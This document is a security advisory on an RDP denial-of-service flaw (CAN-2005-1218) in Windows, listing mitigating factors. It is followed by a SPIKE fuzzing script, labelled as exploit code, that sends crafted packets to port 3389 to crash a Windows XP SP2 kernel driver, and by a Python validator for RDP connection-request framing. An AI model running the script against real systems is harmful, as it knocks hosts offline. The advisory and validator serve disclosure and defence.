A denial of service vulnerability exists that could allow an attacker to send a specially crafted Remote Data Protocol (RDP) message to an affected system. An attacker could cause this system to stop responding.
Mitigating Factors for Remote Desktop Protocol Vulnerability - CAN-2005-1218:
* Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.
* By default, the Remote Desktop Protocol (RDP) is not enabled on any operating system version. On Windows XP and Windows Server 2003, Remote Assistance can enable RDP. On Windows XP Media Center Edition, RDP is enabled if a Media Center Extender has been installed. For information about Media Center Extenders, visit the following Web site.
On Small Business Server 2000 and on Windows Small Business Server 2003, RDP is enabled by default. However, by default, on Windows Small Business Server 2003 and earlier, the RDP communication ports are blocked from the Internet. RDP is available only on the local network unless Terminal Services or the Remote Web Workplace features have been enabled by using the Configure E-mail and Internet Connection Wizard (CEICW).
* If Remote Desktop is manually enabled, the following Windows Firewall changes will occur, depending on the operating system version:
* On Windows XP Service Pack 2 systems that have the Windows Firewall enabled, enabling the Remote Desktop feature will automatically enable the Remote Desktop exception in the firewall, with the scope of All computers (including those on the Internet). When you disable Remote Desktop, this firewall exception is automatically disabled.
* On Windows XP Service Pack 1, Windows Server 2003, and Windows Server 2003 Service Pack 1, enabling the Remote Desktop feature does not enable the Remote Desktop exception in the firewall. Enabling Remote Desktop displays a dialog box indicating that you must enable this exception manually. There is a Remote Desktop entry in the list of firewall exceptions that a user would have to enable manually. Disabling Remote Desktop does not change the status of that exception in the firewall. However, although the system is no longer vulnerable to this issue through Remote Desktop, it could still be vulnerable through Remote Assistance and Terminal Services, where available.
Exploit Code:
// Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
//
// Discovered by:
// Tom Ferris
// tommy[at]security-protocols[dot]com
//
// Tested on:
// Microsoft Windows XP SP2
//
// Usage (SPIKE) : ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
//
// 8/9/2005 Security-Protocols.com
//
// This program is free software; you can redistribute it and/or modify it under
// the terms of the GNU General Public License version 2, 1991 as published by
// the Free Software Foundation.
s_block_start("packet_1");
s_string_variable("03");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D 73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
s_string_variable("");
s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
s_string_variable("");
s_block_end("packet_1");
s_block_start("packet_2");
s_int_variable(0x0500,5);
s_block_end("packet_2");
s_block_start("packet_3");
s_binary("000002020000");
s_string_variable("");
s_block_end("packet_3");
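As an added defender-side example (not part of the advisory or of the SPIKE script above), the following Python validator checks the TPKT and X.224 framing of an RDP Connection Request of the kind the script's first packet carries: the declared TPKT length must match the bytes received, the X.224 length indicator must agree with it, and the mstshash cookie must be CRLF-terminated, printable and bounded in length. The cookie length bound and all sample packets are constructed for this example; the well-formed sample reproduces the byte string quoted in the script.

```python
"""Framing checks for an RDP X.224 Connection Request (TPKT + COTP CR)."""
import struct

TPKT_VERSION = 3
X224_CR = 0xE0            # Connection Request TPDU code (upper nibble)
COOKIE_PREFIX = b"Cookie: mstshash="
MAX_COOKIE = 64           # assumed policy bound for the cookie value (constructed)


def parse_x224_cr(data: bytes) -> dict:
    """Return the parsed fields, or raise ValueError on any framing inconsistency."""
    if len(data) < 11:
        raise ValueError("too short for a TPKT header plus X.224 CR header")
    ver, _reserved, tpkt_len = struct.unpack("!BBH", data[:4])
    if ver != TPKT_VERSION:
        raise ValueError(f"bad TPKT version {ver}")
    if tpkt_len != len(data):
        raise ValueError(f"TPKT length {tpkt_len} does not match {len(data)} bytes received")
    li, code, dst_ref, src_ref, cls = struct.unpack("!BBHHB", data[4:11])
    if code & 0xF0 != X224_CR:
        raise ValueError(f"not a Connection Request (TPDU code 0x{code:02x})")
    if li != tpkt_len - 5:                       # LI counts the bytes after itself
        raise ValueError(f"X.224 LI {li} inconsistent with TPKT length {tpkt_len}")
    payload = data[11:]
    cookie = None
    if payload.startswith(COOKIE_PREFIX):
        end = payload.find(b"\r\n")
        if end < 0:
            raise ValueError("cookie is not CRLF-terminated")
        cookie = payload[len(COOKIE_PREFIX):end]
        if len(cookie) > MAX_COOKIE or not all(32 <= b < 127 for b in cookie):
            raise ValueError("cookie exceeds length bound or contains non-printable bytes")
    return {"dst_ref": dst_ref, "src_ref": src_ref, "class": cls, "cookie": cookie}


def validate(data: bytes) -> str:
    """Convenience wrapper: 'ok' for a well-formed request, otherwise the reason."""
    try:
        parse_x224_cr(data)
        return "ok"
    except ValueError as exc:
        return str(exc)


def build_cr(payload: bytes) -> bytes:
    """Build a consistently framed Connection Request around PAYLOAD (used for samples)."""
    total = 11 + len(payload)
    return struct.pack("!BBH", TPKT_VERSION, 0, total) + struct.pack("!BBHHB", total - 5, X224_CR, 0, 0, 0) + payload


# Constructed samples: the first equals the hex string in the script's packet_1.
GOOD = build_cr(COOKIE_PREFIX + b"Administr\r\n")
NO_CRLF = build_cr(COOKIE_PREFIX + b"A" * 18)          # cookie never terminated
BAD_LEN = GOOD[:2] + b"\x00\x10" + GOOD[4:]            # declared length 16, 39 bytes sent
```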